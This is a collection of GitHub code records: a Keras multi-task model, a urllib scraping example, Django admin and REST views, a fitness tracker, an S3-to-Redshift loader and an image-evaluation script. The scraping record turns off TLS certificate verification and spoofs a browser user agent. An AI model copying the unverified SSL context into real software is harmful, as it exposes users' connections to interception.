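    x = Conv2D(256, 3, activation='relu', padding='same')(c4)
    x = concatenate([UpSampling2D(2)(x), c3])
    x = Conv2D(256, 3, activation='relu', padding='same')(x)
    x = concatenate([UpSampling2D(2)(x), c2])
    return Conv2D(1, 1, activation='sigmoid', name=name)(x)

names = [f'task{i}_output' for i in range(1, 6)]
model = Model(inputs, [task_head(n) for n in names])
model.compile(optimizer=RMSprop(learning_rate=1e-3),
              loss={n: 'binary_crossentropy' for n in names},
              metrics={n: 'acc' for n in names},
              loss_weights={n: 1.0 for n in names})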
+{"seq_id": "28596199650", "text": "\"\"\"\nhttp: plaintext transmission\nhttps: http + ssl, requires a certificate\n\n\n\n\n\"\"\"\nimport ssl\nfrom urllib.request import Request, urlopen\nfrom fake_useragent import UserAgent\n\nurl = \"https://www.12306.cn/index/index.html\"\n\nheaders = {\n    'user-agent': UserAgent().chrome\n}\nrequest = Request(url, headers=headers)\n\n# ignore certificate verification:\ncontext = ssl._create_unverified_context()\nprint(context)  # <ssl.SSLContext object at 0x...>\nresponse = urlopen(request, context=context)\n\ninfo = response.read().decode()\nprint(info)\n", "repo_name": "WakingHours-GitHub/PythonSpider", "sub_path": "1_urllib的使用/8_http请求.py", "file_name": "8_http请求.py", "file_ext": "py", "file_size_in_byte": 541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fake_useragent.UserAgent", "line_number": 16, "usage_type": "call"}, {"api_name": "urllib.request.Request", "line_number": 18, "usage_type": "call"}, {"api_name": "ssl._create_unverified_context", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 23, "usage_type": "call"}]}
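The record above turns certificate checking off entirely with ssl._create_unverified_context(); when the host presents a valid chain, the verified equivalent is a default context built over a CA bundle. A minimal sketch assuming certifi is installed; the target URL here is a stand-in, not the 12306 endpoint from the record.

# verified alternative: build a checking context against certifi's CA bundle
# (assumes: pip install certifi)
import ssl
import certifi
from urllib.request import Request, urlopen

context = ssl.create_default_context(cafile=certifi.where())
request = Request("https://httpbin.org/get",
                  headers={'user-agent': 'Mozilla/5.0'})
with urlopen(request, context=context) as response:
    print(response.status, len(response.read()))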
+{"seq_id": "29990916294", "text": "from django.contrib import admin, messages\n\n# Register your models here.\nfrom api.models import (\n    Category,\n    Check,\n    CheckOutCondition,\n    CheckOutProcess,\n    Item,\n    Location,\n    Person,\n    Preset,\n)\n\n\nclass ItemAdmin(admin.ModelAdmin):\n    list_display = [field.name for field in Item._meta.fields if field.name != \"id\"]\n\n\nadmin.site.register(Category)\nadmin.site.register(Location)\nadmin.site.register(Preset)\nadmin.site.register(Item, ItemAdmin)\nadmin.site.register(Person)\nadmin.site.register(CheckOutProcess)\nadmin.site.register(Check)\n\n\nclass CheckOutConditionAdmin(admin.ModelAdmin):\n    actions = [\"make_default\"]\n\n    def make_default(self, request, queryset):\n        if queryset.count() > 1:\n            self.message_user(\n                request,\n                \"Only one condition can be set as the default.\",\n                level=messages.ERROR,\n            )\n            return\n        cond = queryset[0]\n        cond.default = True\n        cond.save()\n\n    make_default.short_description = \"Set as default\"\n    list_display = (\"text\", \"default\")\n\n\nadmin.site.register(CheckOutCondition, CheckOutConditionAdmin)\n", "repo_name": "elgohr-update/tinventory", "sub_path": "web/api/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1167, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 16, "usage_type": "name"}, {"api_name": "api.models.Item._meta", "line_number": 17, "usage_type": "attribute"}, {"api_name": "api.models.Item", "line_number": 17, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 20, "usage_type": "call"}, {"api_name": "api.models.Category", "line_number": 20, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 20, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 20, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 21, "usage_type": "call"}, {"api_name": "api.models.Location", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 21, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 22, "usage_type": "call"}, {"api_name": "api.models.Preset", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 22, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 22, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 23, "usage_type": "call"}, {"api_name": "api.models.Item", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 24, "usage_type": "call"}, {"api_name": "api.models.Person", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 24, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 25, "usage_type": "call"}, {"api_name": "api.models.CheckOutProcess", 
"line_number": 25, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 26, "usage_type": "call"}, {"api_name": "api.models.Check", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 26, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 26, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 29, "usage_type": "name"}, {"api_name": "django.contrib.messages.ERROR", "line_number": 37, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 37, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 48, "usage_type": "call"}, {"api_name": "api.models.CheckOutCondition", "line_number": 48, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 48, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 48, "usage_type": "name"}]}
+{"seq_id": "8889566311", "text": "\"\"\"Fitness tracker module ver.1.0.4 alpha\"\"\"\n\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass InfoMessage:\n    \"\"\"Informational message about a training session.\"\"\"\n    training_type: str\n    duration: float\n    distance: float\n    speed: float\n    calories: float\n\n    def get_message(self) -> str:\n        return (f'Training type: {self.training_type}; '\n                f'Duration: {self.duration:.3f} h; '\n                f'Distance: {self.distance:.3f} km; '\n                f'Avg. speed: {self.speed:.3f} km/h; '\n                f'Calories burned: {self.calories:.3f}.')\n\n\n@dataclass\nclass Training:\n    \"\"\"Base training class.\"\"\"\n\n    LEN_STEP = 0.65\n    M_IN_KM = 1000\n\n    action: int\n    duration: float\n    weight: float\n\n    def get_spent_calories(self):\n        pass\n\n    def get_distance(self) -> float:\n        \"\"\"Get the distance in km.\"\"\"\n        dist = self.action * self.LEN_STEP / self.M_IN_KM\n        return dist\n\n    def get_mean_speed(self) -> float:\n        \"\"\"Get the mean speed.\"\"\"\n        speed = self.get_distance() / self.duration\n        return speed\n\n    def show_training_info(self) -> InfoMessage:\n        \"\"\"Return an informational message about the completed training session.\"\"\"\n        training_type = self.__class__.__name__\n        distance_info = self.get_distance()\n        speed_info = self.get_mean_speed()\n        calories_info = self.get_spent_calories()\n        msg = InfoMessage(\n            training_type, self.duration,\n            distance_info, speed_info, calories_info)\n        return msg\n\n\nclass Running(Training):\n    \"\"\"Training: running.\"\"\"\n\n    def get_spent_calories(self):\n        speed_ave = self.get_mean_speed()\n        COEFF_CAL_1 = 18\n        COEFF_CAL_2 = 20\n        min_in_hour = 60\n        count_calories = (\n            (COEFF_CAL_1 * speed_ave - COEFF_CAL_2)\n            * self.weight / self.M_IN_KM * self.duration * min_in_hour)\n        return count_calories\n\n\n@dataclass\nclass SportsWalking(Training):\n    \"\"\"Training: sports walking.\"\"\"\n\n    height: int\n\n    def get_spent_calories(self):\n        speed_ave = self.get_mean_speed()\n        COEFF_CAL_1 = 0.035\n        COEFF_CAL_2 = 0.029\n        min_in_hour = 60\n        count_calories = (\n            (COEFF_CAL_1 * self.weight\n             + (speed_ave**2 // self.height)\n             * COEFF_CAL_2 * self.weight)\n            * self.duration * min_in_hour)\n        return count_calories\n\n\n@dataclass\nclass Swimming(Training):\n    \"\"\"Training: swimming.\"\"\"\n\n    LEN_STEP = 1.38\n\n    length_pool: int\n    count_pool: int\n\n    def get_mean_speed(self):\n        speed_ave = (\n            self.length_pool * self.count_pool / self.M_IN_KM / self.duration)\n        return speed_ave\n\n    def get_spent_calories(self):\n        speed_ave = self.get_mean_speed()\n        COEFF_CAL_1 = 1.1\n        COEFF_CAL_2 = 2\n        count_calories = (\n            (speed_ave + COEFF_CAL_1)\n            * COEFF_CAL_2 * self.weight)\n        return count_calories\n\n\ndef read_package(workout_type: str, data: list) -> Training:\n    \"\"\"Read the data received from the sensors.\"\"\"\n    dict_of_actions = {'SWM': Swimming,\n                       'RUN': Running,\n                       'WLK': SportsWalking}\n    if workout_type in dict_of_actions:\n        return dict_of_actions[workout_type](*data)\n    print(f'Error: unknown workout type {workout_type}')\n\n\ndef main(training: Training) -> None:\n    \"\"\"Main function.\"\"\"\n    info = training.show_training_info()\n    msg = info.get_message()\n    print(msg)\n\n\nif __name__ == '__main__':\n    packages = [\n        ('SWM', [720, 1, 80, 25, 40]),\n        ('RUN', [15000, 1, 75]),\n        ('WLK', [9000, 1, 75, 180]),\n    ]\n\n    for workout_type, data in packages:\n        training = read_package(workout_type, data)\n        main(training)\n", "repo_name": "areyouright/python", "sub_path": "homework.py", "file_name": "homework.py", "file_ext": "py", 
"file_size_in_byte": 4169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dataclasses.dataclass", "line_number": 6, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 24, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 74, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 93, "usage_type": "name"}]}
+{"seq_id": "14944624503", "text": "from django.shortcuts import get_object_or_404\nfrom rest_framework import (\n    filters,\n    mixins,\n    permissions,\n    status,\n    views,\n    viewsets\n)\nfrom rest_framework.response import Response\n\nfrom api.permissions import AdminOrReadOnly\nfrom api.serializers import (\n    AltDeleteItemsSerialSerializer,\n    CategorySerializer,\n    CategorySerializerGet,\n    ItemSerializer,\n    NameSerializer,\n    NameSerializerGet,\n    PostItemsSerialSerializer\n)\nfrom store.models import Category, Item, Name\n\n\nclass CategoryViewSet(viewsets.ModelViewSet):\n    queryset = Category.objects.all()\n    serializer_class = CategorySerializer\n    permission_classes = (AdminOrReadOnly, )\n\n    def get_serializer_class(self):\n        if self.action == 'retrieve':\n            return CategorySerializerGet\n        return CategorySerializer\n\nclass ItemViewSet(viewsets.ModelViewSet):\n    queryset = Item.objects.all()\n    serializer_class = ItemSerializer\n    permission_classes = (AdminOrReadOnly, )\n\nclass NameViewSet(viewsets.ModelViewSet):\n    queryset = Name.objects.all()\n    serializer_class = NameSerializer\n    permission_classes = (AdminOrReadOnly, )\n    \n    def get_serializer_class(self):\n        if self.action == 'retrieve':\n            return NameSerializerGet\n        return NameSerializer\n\n    def perform_create(self, serializer):\n        category = self.request.data.get('category')\n        category = get_object_or_404(Category, id=category)\n        serializer.save(category=category)\n\nclass PostItemsSerialViews(views.APIView):\n    \"\"\"\n    Hypothetical need to create Items of a single model (Name),\n    passing only serial numbers in the JSON, with the Name taken from the URL.\n    \"\"\"\n    permission_classes = (permissions.IsAdminUser,)\n\n    def post(self, request, name_id):\n        data = request.data.get('model_items')\n        serializer = PostItemsSerialSerializer(\n            data=data, many=True,\n            context={'name_id': name_id, 'request': request})\n        if serializer.is_valid():\n            serializer.save()\n            serializer = ItemSerializer(\n                instance=serializer.instance,\n                context={'request': self.request},\n                many=True)\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass DeleteItemsSerialViews(views.APIView):\n    \"\"\"\n    Hypothetical need to delete arbitrary Items,\n    passing only serial numbers in the JSON.\n    Upd. Deletes every Item it finds;\n    the rest are returned with an error.\n    \"\"\"\n    permission_classes = (permissions.IsAdminUser,)\n\n    def delete(self, request):\n        data_set = request.data.get('model_items')\n        data_success = {}\n        lists_error = []\n        for data in data_set:\n            item_serial = data['serial_num']\n            if Item.objects.filter(serial_num=item_serial).exists():\n                data_success[item_serial] = 'Item deleted successfully'\n                Item.objects.filter(serial_num=item_serial).delete()\n            else:\n                lists_error.append({'serial_num': item_serial})\n        if lists_error:\n            data_success['error'] = lists_error\n            data_success['error_info'] = 'serial number(s) not found.'\n            i_status = status.HTTP_400_BAD_REQUEST\n        else:\n            i_status = status.HTTP_204_NO_CONTENT\n        return Response(data_success, status=i_status)\n\nclass AltDeleteItemsSerialViews(views.APIView):\n    \"\"\"\n    Alternative deletion method by serial number.\n    Deletes only if all serial numbers are valid.\n    \"\"\"\n    permission_classes = (permissions.IsAdminUser,)\n\n    def delete(self, request):\n        data_set = request.data.get('model_items')\n        serializer = AltDeleteItemsSerialSerializer(\n            data=data_set, many=True)\n        serializer.is_valid(raise_exception=True)\n        for data in serializer.validated_data:\n            data.delete()\n        return Response(status=status.HTTP_204_NO_CONTENT)\n", "repo_name": "ZOMini/computer_store", "sub_path": "c_store/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4373, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 25, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 25, "usage_type": "name"}, {"api_name": "store.models.Category.objects.all", "line_number": 26, "usage_type": "call"}, {"api_name": "store.models.Category.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "store.models.Category", "line_number": 26, "usage_type": "name"}, {"api_name": "api.serializers.CategorySerializer", "line_number": 27, "usage_type": "name"}, {"api_name": "api.permissions.AdminOrReadOnly", "line_number": 28, "usage_type": "name"}, {"api_name": "api.serializers.CategorySerializerGet", "line_number": 31, "usage_type": "name"}, {"api_name": "api.serializers.CategorySerializer", "line_number": 32, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 34, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 34, "usage_type": "name"}, {"api_name": "store.models.Item.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "store.models.Item.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "store.models.Item", "line_number": 35, "usage_type": "name"}, {"api_name": "api.serializers.ItemSerializer", "line_number": 36, "usage_type": "name"}, {"api_name": "api.permissions.AdminOrReadOnly", "line_number": 37, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 39, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 39, "usage_type": "name"}, {"api_name": "store.models.Name.objects.all", "line_number": 40, "usage_type": "call"}, {"api_name": "store.models.Name.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "store.models.Name", "line_number": 40, "usage_type": "name"}, {"api_name": "api.serializers.NameSerializer", "line_number": 41, "usage_type": "name"}, 
{"api_name": "api.permissions.AdminOrReadOnly", "line_number": 42, "usage_type": "name"}, {"api_name": "api.serializers.NameSerializerGet", "line_number": 46, "usage_type": "name"}, {"api_name": "api.serializers.NameSerializer", "line_number": 47, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 51, "usage_type": "call"}, {"api_name": "store.models.Category", "line_number": 51, "usage_type": "argument"}, {"api_name": "rest_framework.views.APIView", "line_number": 54, "usage_type": "attribute"}, {"api_name": "rest_framework.views", "line_number": 54, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 59, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 59, "usage_type": "name"}, {"api_name": "api.serializers.PostItemsSerialSerializer", "line_number": 63, "usage_type": "call"}, {"api_name": "api.serializers.ItemSerializer", "line_number": 68, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 72, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 72, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 72, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 73, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 73, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 76, "usage_type": "attribute"}, {"api_name": "rest_framework.views", "line_number": 76, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 83, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 83, "usage_type": "name"}, {"api_name": "store.models.Item.objects.filter", "line_number": 91, "usage_type": "call"}, {"api_name": "store.models.Item.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "store.models.Item", "line_number": 91, "usage_type": "name"}, {"api_name": "store.models.Item.objects.filter", "line_number": 93, "usage_type": "call"}, {"api_name": "store.models.Item.objects", "line_number": 93, "usage_type": "attribute"}, {"api_name": "store.models.Item", "line_number": 93, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 99, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 99, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 101, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 102, "usage_type": "call"}, {"api_name": "rest_framework.views.APIView", "line_number": 104, "usage_type": "attribute"}, {"api_name": "rest_framework.views", "line_number": 104, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 109, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 109, "usage_type": "name"}, {"api_name": "api.serializers.AltDeleteItemsSerialSerializer", "line_number": 113, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_204_NO_CONTENT", "line_number": 118, "usage_type": "attribute"}, 
{"api_name": "rest_framework.status", "line_number": 118, "usage_type": "name"}]}
+{"seq_id": "4337144771", "text": "import boto3\nfrom boto3.s3.transfer import S3Transfer\nfrom boto.s3.connection import S3Connection, Bucket, Key\nimport logging\nimport numpy as np\nimport pandas as pd\nimport pdb\nimport psycopg2\n\nlogger=logging.getLogger(__name__)\n\ntableName = ''\nlakeUser = ''\nlakePassword = ''\n\npeProdRedshiftAccessKey = ''\npeProdRedshiftSecretAccessKey = ''\nbucketName = ''\nschemaName = ''\nlakeDBName = ''\nlakeHost = ''\nlakePort = 5439\n\nlakeConnection = psycopg2.connect(dbname=lakeDBName,\n host=lakeHost,\n port=lakePort,\n user=lakeUser,\n password=lakePassword)\n\nisFirstRun=False\n\ndef remove_delimiters (delimiters, s):\n new_s = str(s)\n for i in delimiters: \n new_s = new_s.replace(i, ' ')\n return ' '.join(new_s.split())\n\ndef push_file(fileName):\n output=pd.read_csv(fileName,parse_dates=['create_time'])\n push_to_s3(output=output,fileName=fileName)\n if isFirstRun:\n# try:\n# drop()\n# except:\n# pass\n create()\n push_to_redshift()\n \ndef push_to_s3(output=None,fileName=None):\n client = boto3.client('s3', aws_access_key_id=peProdRedshiftAccessKey,\n aws_secret_access_key=peProdRedshiftSecretAccessKey)\n transfer = S3Transfer(client)\n transfer.upload_file(fileName, 'pe-prod-redshift',\n 'adhoc_upload_files'+'/'+'Pred_SA_{}.csv'.format(output.create_time.max().date().strftime('%Y-%m-%d')))\n logger.info(\"File copied.\")\n\ndef push_to_redshift():\n lakeCursor = lakeConnection.cursor()\n logger.info(schemaName+\"\"\".\"\"\"+tableName)\n logger.warning(\"Deleting Table\")\n lakeCursor.execute(\"DELETE \"+schemaName+\"\"\".\"\"\"+tableName+\";\")\n lakeCursor.execute(\"COMMIT;\")\n lakeCursor.execute(\"END;\")\n logger.warning(\"Reinitializing tables\")\n lakeInsertQuery = \"\"\"\n COPY \"\"\" + schemaName + \"\"\".\"\"\" + tableName + \"\"\"\n FROM\n 's3://pe-prod-redshift/adhoc_upload_files/Pred_SA_'\n credentials 'aws_access_key_id=\"\"\"+peProdRedshiftAccessKey+\"\"\";aws_secret_access_key=\"\"\"+peProdRedshiftSecretAccessKey+\"\"\"'\n IGNOREHEADER 1 delimiter ',' region 'ap-southeast-1'\n;\n \"\"\"\n lakeCursor = lakeConnection.cursor()\n logger.info(lakeInsertQuery)\n lakeCursor.execute(lakeInsertQuery)\n lakeCursor.execute(\"COMMIT;\")\n lakeCursor.execute(\"END;\")\n logger.info(\"Data copied.\")\n\n \ndef create():\n# id,order_id,text,create_time,total_length,capitals,caps_vs_length,num_words,num_unique_words,words_vs_unique,Sentiment_Output,Department_Output\n#\n lakeCreateTable=\"\"\"\n CREATE TABLE \"\"\" + schemaName + \"\"\".\"\"\" + tableName + \"\"\" \n (\n \"id\" varchar(256) NOT NULL,\n \"order_id\" varchar(256) NOT NULL,\n \"text\" varchar(65535),\n \"create_time\" datetime NOT NULL,\n \"total_length\" numeric(18,0),\n \"capitals\" numeric(18,8),\n \"caps_vs_length\" numeric(18,8),\n \"num_words\" numeric(18,8),\n \"num_unique_words\" numeric(18,8),\n \"words_vs_unique\" numeric(18,8),\n \"Sentiment_Output\" varchar(256) NOT NULL,\n \"Department_Output\" varchar(256) NOT NULL,\n PRIMARY KEY(order_id,create_time)\n );\"\"\"\n \n lakeCursor = lakeConnection.cursor()\n lakeCursor.execute(\"BEGIN;\")\n lakeCursor.execute(lakeCreateTable)\n lakeCursor.execute(\"COMMIT;\")\n logger.warning(\"Table created.\")\n \ndef drop():\n lakeDropTable=\"\"\"\n DROP TABLE \"\"\" + schemaName + \"\"\".\"\"\" + tableName + \"\"\" ;\"\"\"\n lakeCursor = lakeConnection.cursor()\n lakeCursor.execute(\"BEGIN;\")\n lakeCursor.execute(lakeDropTable)\n lakeCursor.execute(\"COMMIT;\")\n lakeCursor.execute(\"END;\")\n logger.warning(\"Table 
Dropped.\")\n \n", "repo_name": "SmokeShine/Call_Volume_Prediction_with_Scheduling", "sub_path": "src/models/push_to_db.py", "file_name": "push_to_db.py", "file_ext": "py", "file_size_in_byte": 3839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "psycopg2.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 39, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 50, "usage_type": "call"}, {"api_name": "boto3.s3.transfer.S3Transfer", "line_number": 52, "usage_type": "call"}]}
+{"seq_id": "35501671704", "text": "import csv\nimport glob\nimport os\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nfrom sklearn.metrics import confusion_matrix\nfrom tqdm import tqdm_notebook as tqdm\n\n\n# 混同行列を作成\ndef plot_confusion_matrix(cm, title=\"Confusion matrix\", cmap=plt.cm.Blues):\n plt.imshow(cm, interpolation=\"nearest\", cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(2)\n plt.xticks(tick_marks, [\"p\", \"n\"])\n plt.yticks(tick_marks, [\"Back\", \"Road\"])\n plt.tight_layout()\n plt.ylabel(\"True label\")\n plt.xlabel(\"Predicted label\")\n\n\n# 作成した図を表示して保存\ndef do_plot(test, pred, path, title=\"Normalized Confusion matrix\"):\n cm = confusion_matrix(test, pred)\n cm_normalized = cm.astype(\"float\") / cm.sum(axis=1)[:, np.newaxis]\n\n cm_normalized = [[cm_normalized[1][1], cm_normalized[1][0]],\n [cm_normalized[0][1], cm_normalized[0][0]]]\n\n plt.figure()\n plot_confusion_matrix(cm_normalized, title=title)\n plt.savefig(path + \"figure.png\") # learned_model_path\n plt.show()\n\n\n# 差異を出力するために必要なデータを作成\ndef get_diff_data(pred_path):\n bases = []\n preds = []\n filenames = []\n base_dir = \"./dataset/base_data/Roads/Test_Set/\"\n pred_dir = \"./dataset/eva_imgs/{}/large/\".format(pred_path)\n for base, pred in tqdm(zip(glob.glob(base_dir + \"*.tif\"), os.listdir(pred_dir)), desc=\"loading... \"):\n filenames.append(os.path.splitext(pred)[0])\n preds.append(pred_dir + pred)\n bases.append(base.replace('\\\\', '/'))\n return bases, preds, filenames\n\n\n# 出力画像とテスト画像の差異を表示\ndef show_diff(pred_path):\n diff_arr = []\n bases, preds, filenames = get_diff_data(pred_path)\n for num, filename in tqdm(enumerate(filenames), desc=\"images \", total=len(filenames)):\n match_count = 0\n base = cv2.imread(bases[num])\n pred = cv2.imread(preds[num])\n for i in tqdm(range(1280), desc=\"check match \", leave=False):\n for j in range(1280):\n # 予測済みデータには0, 255以外に半端な値が多く含まれているためそれらを除いた値でカウントしている\n if sum(base[i][j]) == sum(pred[i][j]):\n match_count += 1\n diff_arr.append([filename, match_count])\n # print(diff_arr)\n columns = [\"image_name\", \"match_count\"]\n df = pd.DataFrame(diff_arr, columns=columns)\n return df\n\n\n# テスト画像と予測済みデータを比較して誤っているデータの散布図を出力\ndef plot_diff_scat(test, pred):\n df = df.set_index(\"image_name\")\n plt.scatter(df.index, df['match_count'])\n plt.xticks(rotation=70)\n plt.show()\n\n\n# テスト画像と予測済みデータを比較して一致しているピクセル数を棒グラフとして出力\ndef plot_diff_bar(df, path, num=10, asce=False):\n df_asce = df.sort_values(by=\"match_count\", ascending=asce)\n plt.bar(df_asce['image_name'][:num], df_asce['match_count'][:num])\n plt.xticks(rotation=90)\n if (asce):\n plt.savefig(path + \"bar_graph.png\") # learned_model_path\n else:\n plt.savefig(path + \"arc_bar_graph.png\") # learned_model_path\n plt.show()\n\n\n# 出力のネガポジを判定\ndef make_diff_image(pred_path):\n WHITE = 765\n BLACK = 0\n img_size = 1280\n diff_arr = []\n bases, preds, filenames = get_diff_data(pred_path)\n validation_data = [filenames]\n for num, name in tqdm(enumerate(filenames)):\n diff_arr.append([])\n TP = 0\n TN = 0\n FP = 0\n FN = 0\n base = cv2.imread(bases[num])\n pred = cv2.imread(preds[num])\n for i in range(img_size):\n for j in range(img_size):\n # 予測済みデータには0, 255以外に半端な値が多く含まれているためそれらを除いた値でカウントしている\n if abs(sum(base[i][j]) - WHITE) < 100 and abs(sum(pred[i][j]) - WHITE) < 100:\n diff_arr[num].append([255, 255, 255]) # 白\n TP += 1\n elif abs(sum(base[i][j]) - BLACK) < 100 and abs(sum(pred[i][j]) - BLACK) < 100:\n 
diff_arr[num].append([0, 0, 0]) # 黒\n TN += 1\n elif sum(base[i][j]) == BLACK and sum(pred[i][j]) != BLACK:\n diff_arr[num].append([0, 128, 0]) # 緑\n FP += 1\n elif sum(base[i][j]) == WHITE and sum(pred[i][j]) != WHITE:\n diff_arr[num].append([255, 0, 0]) # 赤\n FN += 1\n validation_data.append([TP, TN, FP, FN])\n return diff_arr, filenames, validation_data\n\n\n# ネガポジ判定した値を画像として出力(赤:PN, 緑:NP)\ndef plot_diff_image(now):\n save_dir = \"./dataset/pn_imgs/\" + str(now) + \"/\"\n os.makedirs(save_dir, exist_ok=True)\n arr, filenames, validation_data = make_diff_image(now)\n for i, name in tqdm(enumerate(filenames), total=len(arr)):\n img = np.uint8(arr[i]).reshape(1280, 1280, 3)\n img = Image.fromarray(img)\n img.save(save_dir + name + \".jpg\")\n return validation_data\n\n\n# 混同行列と評価値を画像ごとにCSVとして出力\ndef evaluation(validation_data, now):\n completeness = []\n correctness = []\n quality = []\n count = 0\n filename = validation_data[0]\n validation_data = validation_data[1:]\n save_dir = \"./dataset/evaluation/\"\n os.makedirs(save_dir, exist_ok=True)\n for name, data in tqdm(zip(filename, validation_data)):\n TP = data[0]\n TN = data[1]\n FP = data[2]\n FN = data[3]\n completeness = '%.4f' % (TP / (TP + FN))\n correctness = '%.4f' % (TP / (TP + FP))\n quality = '%.4f' % (TP / (TP + FN + FP))\n with open(save_dir + str(now) + \".csv\", 'a') as f:\n fieldnames = ['image_name', 'TruePositive', 'FalsePositive', 'TrueNegative',\n 'FalseNegative', 'Completeness', 'Correctness', 'Quality']\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n if count == 0:\n writer.writeheader()\n writer.writerow({'image_name': name, 'TruePositive': TP, 'FalsePositive': TN, 'TrueNegative': FP, 'FalseNegative': FN,\n 'Completeness': completeness, 'Correctness': correctness, 'Quality': quality})\n count += 1\n\n\n# evaluation('01172024')\n\n# filename = \"./dataset/evaluation/01161510.csv\"\n# f = pd.read_csv(filename)\n# y = f['Quality']\n# x_name = f['image_name']\n# xx = [i for i in range(49)]\n# plt.barh(xx, y, height=0.3, align='center')\n# plt.yticks(xx, x_name)\n# plt.show()\n", "repo_name": "naoyasugita/dissertation", "sub_path": "src/post_process.py", "file_name": "post_process.py", "file_ext": "py", "file_size_in_byte": 6733, "program_lang": "python", "lang": "en", "doc_type": "code", 